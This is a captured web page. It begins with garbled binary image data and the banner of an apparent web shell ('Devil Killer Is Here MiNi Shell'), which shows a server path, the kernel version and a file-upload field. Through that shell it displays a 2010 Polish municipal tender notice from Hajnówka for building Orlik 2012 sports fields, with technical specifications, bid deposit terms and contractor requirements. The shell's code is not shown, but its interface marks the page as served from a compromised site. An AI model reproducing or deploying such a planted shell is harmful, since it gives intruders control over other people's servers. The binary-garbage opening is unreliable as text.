JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/133162-N-2010.html

<p class="kh_header"><b>Hajnówka: Budowa  kompleksu  boisk  sportowych  w  ramach  programu  Moje  Boisko  -  Orlik  2012  w  Hajnówce  przy  ul. 3-go  Maja  25</b><br>
<b>Numer ogłoszenia: 133162 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hajnówka , ul. Aleksego Zina 1, 17-200 Hajnówka, woj. podlaskie, tel. 085 6822180, 6822875, faks 085 6822994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hajnowka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  kompleksu  boisk  sportowych  w  ramach  programu  Moje  Boisko  -  Orlik  2012  w  Hajnówce  przy  ul. 3-go  Maja  25.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  realizacja  projektu  pn: Budowa  kompleksu  boisk  sportowych  w  ramach  programu  Moje  Boisko  -  Orlik  2012 w  Hajnówce  przy  ul. 3-go  Maja  25  polegająca  na:

1. Budowie  boiska  do  piłki  nożnej  o  wymiarach  30,0 m x 62,0 m  o  powierzchni  1.860 m2 
    (pole  gry  26,0 m x 56,0 m)  w  tym :
     a. podbudowa  przepuszczalna, 
     b. nawierzchnia  syntetyczna  do  piłki  nożnej  typu  sztuczna  trawa o  właściwościach            
         i  technologii  układania  określonych  w  dokumentacji  projektowej  (załącznik  Nr 9  do 
         SIWZ)  i  SST  (załącznik  Nr 10  do  SIWZ) :
         -  wysokość  włókna  min. 60 mm  na  podbudowie  z  kruszywa  (wypełnienie  trawy  
             zgodnie  z  badaniem  specjalistycznego  laboratorium  np. Labosport), 
         -  typ  włókna: monofil,
         -  skład  chemiczny  włókna: polietylen,
         -  ciężar  włókna: min. 11.000 Dtex,
         -  gęstość  trawy: min. 97.000 włókien /m2,
     c. obrzeża  betonowe  na  ławie  betonowej, oddzielające  sąsiednie  elementy  terenu  od 
         płyty  boiska, 
     Wszystkie  elementy  zgodne  z  właściwościami  określonymi  w  dokumentacji  technicznej.
     Roboty  należy  wykonać  zgodnie  z  dokumentacją  projektową  (załącznik  Nr 9  do  SIWZ)      
     i  SST  (załącznik  Nr 10  do  SIWZ).   
     d. wyposażenie :
         -  bramki  aluminiowe  mocowane  w  tulejach  -  2 szt.					
         -  siatki  do  bramek  -  2 szt.                                        					

2. Budowie boiska wielofunkcyjnego  o  wymiarach  50 m x 30 m  o  powierzchni  1.500 m2  
    (pole  gry 40 m x 20 m)  w  tym :
     a. podbudowa  przepuszczalna, 
     b. nawierzchnia  poliuretanowa  o  właściwościach  i  technologii  układania  określonych  w  
         dokumentacji  projektowej  (załącznik  Nr 9  do  SIWZ) i SST  (załącznik  Nr 10  do  SIWZ). 
         Technologia  układania  nawierzchni : technologia  typu  EPDM  -  nawierzchnia gładka, 
         przepuszczalna  dla wody, wykonana  dwuwarstwowo. W  przypadku  zastosowania 
         podbudowy  przepuszczalnej  nawierzchnie  tego  typu  należy  wykonać  na  podbudowie 
         elastycznej  typu  ET  o  grubości  min. 30 mm. Dolna  warstwa  z  granulatu  SBR  min          
         7 mm, górna  warstwa  wykonana  z  kolorowego  granulatu  EPDM  min. 7 mm.
     c. wyposażenie  do  piłki  ręcznej:
         -  bramki  aluminiowe  mocowane  w  tulejach  -  2 szt.					
         -  siatki  do  bramek  -  2 szt.                                        
     
3. Ogrodzenie  terenu.
    Szczegółowe  rozwiązania  wg dokumentacji  projektowej  (załącznik  Nr 9  do  SIWZ)  oraz 
    SST  (załącznik  Nr 10  do  SIWZ).

4. Oświetlenie  terenu. 
    Oświetlenie  obiektu  będą  stanowiły  projektory  zamocowane  na  10 masztach  o  wysokości 
    min. 9 m. Szczegółowe  rozwiązania  wg dokumentacji  projektowej  (załącznik  Nr 9 do  SIWZ) 
    oraz  SST  (załącznik  Nr 10  do  SIWZ).

5. Chodniki
    Ciągi  komunikacyjne  i  powierzchnia  przeznaczona  pod  kontener  (na  odpady  stałe)  -  
    kostka  brukowa  gr. min 6 cm, na  podbudowie  z  piasku  i  kruszywa, zamknięta  obrzeżem 
    betonowym. Szczegółowe  rozwiązania  wg dokumentacji  projektowej  (załącznik  Nr 9  do 
    SIWZ)  oraz  SST  (załącznik  Nr 10  do  SIWZ).

6. Przebudowa  i  zmiana  sposobu  użytkowania  części  budynku  warsztatowo - technicznego  po  byłej  kotłowni  na  zaplecze  szatniowo - socjalne  (pomieszczenia  sanitarne, magazynowe, szatnie  i  pomieszczenie  trenera) :
     -  powierzchnia  zabudowy       -   147,80 m2,  
     -  powierzchnia  użytkowa        -   115,90 m2,  
     -  kubatura                                 -   592,00 m3,
     Szczegółowe  rozwiązania  wg dokumentacji  projektowej  (załącznik  Nr 9  do  SIWZ)  oraz  
     SST  (załącznik  Nr 10  do  SIWZ).
                          
Wymagany  okres  gwarancji  dla  elementów  przedmiotu  zamówienia  wymienionych           w  punktach  od  1  do  6:
na  wykonane  roboty  (materiały  i  robociznę)  wynosi  36 miesięcy  od  dnia  odebrania przez  Zamawiającego  robót  budowlanych  i  podpisania  (bez uwag)  protokołu  odbioru końcowego  przedmiotu  zamówienia.
na  nawierzchnie  syntetyczne  oraz  granulat  użyty  do  wypełnienia  nawierzchni  ze sztucznej  trawy  -  60 miesięcy  od  podpisania  (bez uwag)  protokołu  odbioru końcowego  przedmiotu  zamówienia.

Szczegółowy  opis  elementów  przedmiotu  zamówienia  wymienionych  w  punktach  od  1  do  6 stanowią  załączniki  do  SIWZ: 

Załącznik  Nr   8  -  Przedmiar  robót.      
Załącznik  Nr   9  -  Dokumentacja  projektowa.
Załącznik  Nr 10  -  Szczegółowe  specyfikacje  techniczne  wykonania  i  odbioru  robót   
                                Budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferent  przystępujący  do  przetargu  zobowiązany  jest  wnieść  wadium  w  wysokości  
    20.000,00 zł  (słownie: dwadzieścia  tysięcy  złotych). 
2. Wadium  może  być  wnoszone  w  jednej  lub  kilku  następujących  formach:
    a.  pieniądzu,
    b.  poręczeniach  bankowych,
    c.  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej, z  tym  że  poręczenie  kasy 
         jest  zawsze  poręczeniem  pieniężnym,
    d.  gwarancjach  bankowych,  
    e.  gwarancjach  ubezpieczeniowych,  
    f.  poręczeniach  udzielanych  przez  podmioty, o  których  mowa  w  art. 6b  ust. 5 pkt 2  ustawy    
         z  dnia  9 listopada  2000 roku  o  utworzeniu  Polskiej  Agencji  Rozwoju  Przedsiębiorczości
         (Dz. U.  z  2007 r. Nr  42, poz. 275  wraz  z  późniejszymi  zmianami).
3. Wadium  wnoszone  w  formie  pieniężnej  należy  wpłacić  przelewem  na  rachunek  bankowy
    Nr  52 1020 1332 0000 1302 0037 7218  w  PKO  BP  S.A.  Oddział  w  Hajnówce  z  dopiskiem 
    na  blankiecie  przelewu  Wadium - Budowa  kompleksu  boisk  sportowych  w  ramach  
    programu  Moje  Boisko  -  Orlik  2012 w  Hajnówce  przy  ul. 3-go  Maja  25. Dowód  
    wpłaty  lub  jego  kserokopię  poświadczoną  za  zgodność  z  orginałem  należy  dołączyć  do  
    oferty. Nie  dopuszcza  się  wnoszenia  wadium  w  formie  pieniężnej  w  kasie  Zamawiającego.
4. Wadium  wnoszone  w  formie  poręczenia  bankowego, poręczenia  spółdzielczej  kasy  
    oszczędnościowo - kredytowej, gwarancji  bankowej, gwarancji  ubezpieczeniowej  lub  
    poręczenia  udzielonego  przez  Polską  Agencję  Rozwoju  Przedsiębiorczości, należy  złożyć   
    w  formie  oryginału  w  sekretariacie  Zamawiającego  (pok. Nr 219). Do  oferty  należy  
    załączyć  kserokopię  potwierdzoną  za  zgodność  z  orginałem.
5. Z  treści  gwarancji  (poręczenia)  musi  jednoznacznie  wynikać, jaki  jest  sposób  reprezentacji
    Gwaranta. Gwarancja  musi  być  podpisana  przez  upoważnionego  (upełnomocnionego) 
    przedstawiciela  Gwaranta. Podpis  powinien  być  sporządzony  w  sposób  umożliwiający  jego
    identyfikację  (złożony  wraz  z  imienną  pieczątką  lub  czytelny  z  podaniem  imienia                
    i  nazwiska). Z  treści  gwarancji  musi  wynikać  bezwarunkowe  zobowiązanie  Gwaranta  do  
    wypłaty  Zamawiającemu  pełnej  kwoty  wadium  w  okolicznościach  określonych  w  art. 46
    ust. 4a  i  5  ustawy, na  każde  pisemne  żądanie  zgłoszone  przez  Zamawiającego  w  terminie  
    związania  ofertą.
6. Wadium  musi  być  wniesione  najpóźniej  do  wyznaczonego  terminu  składania  ofert,            
    tj.  do  dnia  01 czerwca  2010 roku, godz. 1000.
7. W  przypadku  wadium  wnoszonego  w  pieniądzu  za  pomocą  przelewu  bankowego  decyduje  
    data  i  godzina  księgowania  na  rachunku  bankowym  Zamawiającego.
8. Wykonawca, który  nie  wniesie  wadium  lub  nie  zabezpieczy  oferty  akceptowalną  formą  
    wadium  zostanie  wykluczony  z  postępowania, a  jego  oferta  zostanie  odrzucona.
9. Zwrot  lub  zatrzymanie  wniesionego  wadium  nastąpi  w  oparciu  o  postanowienia  art. 46   
    ustawy  z  dnia  29 stycznia  2004 roku  prawo  zamówień  publicznych  (Dz. U. z  2007 roku         
    Nr 223, poz. 1655 j.t.  wraz  z  późniejszymi  zmianami).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za  spełnienie  warunku  zamawiający  uzna  wykonanie  w  okresie  ostatnich  pięciu  lat  
           przed  upływem  terminu  składania  ofert, a  jeżeli  okres  prowadzenia  działalności  jest  
           krótszy - w tym  okresie, robót  budowlanych  polegających  na  budowie  boisk  sportowych  
           (CPV 45.21.22.21-1), w  tym:
           a. co  najmniej  dwóch  boisk  piłkarskich  z  nawierzchnią  z  trawy  syntetycznej,  
           b. co  najmniej  dwóch  boisk  z  nawierzchnią  poliuretanową, 
           wraz  z  załączeniem  dokumentów  potwierdzających, że  roboty  te  zostały  wykonane  
           zgodnie  z  zasadami  sztuki  budowlanej  i  prawidłowo  ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  winien  dysponować  osobami, które  będą  uczestniczyć  w  wykonywaniu 
    zamówienia  legitymujące  się  kwalifikacjami  zawodowymi, doświadczeniem                  
    i  wykształceniem  odpowiednimi  do  stanowisk  jakie  im  zostaną  powierzone  -                      
    zgodnie  z  poniższym  wykazem :
                -  Kierownik  Budowy   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  konstrukcyjno - budowlanej  lub  
                                                            odpowiadające  im  uprawnienia  wydane  na  
                                                            podstawie  wcześniej  obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                             uzyskania  uprawnień,                                              
                -  Kierownik  Robót  w  branży  sanitarnej   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  sanitarnej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                             uzyskania  uprawnień,
                -  Kierownik  Robót  w  branży  elektrycznej   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  elektrycznej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                             uzyskania  uprawnień,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi  być  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie 
prowadzonej  działalności  związanej  z  przedmiotem  zamówienia  na  wartość  nie 
            mniejszą  niż  500 000,00 zł  (słownie: pięćset  tysięcy  00)100  złotych).  
UWAGA : 
                 Wartości  podane  w  dokumentach  w  walutach  innych  niż  waluta  polska  
                 Wykonawca  przeliczy  wg  średniego  kursu  NBP  na  7 dni  przed  terminem  
                 składania  ofert .

2. Wykonawcy, którzy  nie  wykażą  spełnienia  warunków  udziału  w  postępowaniu  podlegać  
     będą  wykluczeniu  z  udziału  w  postępowaniu  na  podstawie  art. 24  ust. 1 i 2 ustawy. Ofertę  
     Wykonawcy  wykluczonego  uznaje  się  za  odrzuconą.
3. Ocena  spełniania  w)w  warunków  dokonana  zostanie  zgodnie  z  formułą  spełnia - nie  
    spełnia  w  oparciu  o  informacje  zawarte  w  dokumentach  i  oświadczeniach 
    wyszczególnionych  w  rozdziale  VI  niniejszej  specyfikacji. Z  treści  załączonych  
    dokumentów  musi  wynikać  jednoznacznie, iż  wyżej wymienione  warunki  Wykonawca  spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.1. Dokumenty dotyczące nawierzchni poliuretanowej:
          a. certyfikat  lub  deklaracja  zgodności  z  normą  PN-EN 14877:2008, lub 
aprobata  techniczna  ITB, lub 
rekomendacja  techniczna  ITB, lub 
wyniki  badań  specjalistycznego  laboratorium  potwierdzające  parametry  oferowanej nawierzchni  np. Labosport, lub  dokument  równoważny,
           b. karta  techniczna  oferowanej  nawierzchni, potwierdzona  przez  jej  producenta, 
           c. atest  PZH  lub  równoważny  dla  oferowanej  nawierzchni,
           d. autoryzacja  producenta  nawierzchni  poliuretanowej, wystawiona  dla  wykonawcy  na 
                realizowaną  inwestycję  wraz  z  potwierdzeniem  gwarancji  udzielonej  przez 
                producenta  na  tą  nawierzchnię,
     4.2. Dokumenty  dotyczące  systemu  nawierzchni  nawierzchni  z  trawy  syntetycznej:
           a. aktualny  certyfikat  FIFA 1  Star  lub  FIFA 2  Star  dla  obiektu  wykonanego                            
               z  oferowanego  systemu  nawierzchni  i  raport  z  badań  przeprowadzonych  przez  
               laboratorium  (Labosport  lub  ISA - Sport  lub  Sports  Labs  Ltd), dotyczący  oferowanej      
               nawierzchni, potwierdzający  zgodność  jej  parametrów  z  FIFA  Quality  Concept  for  
               Football  Turf  (dostępny  na  www.FIFA.com), 
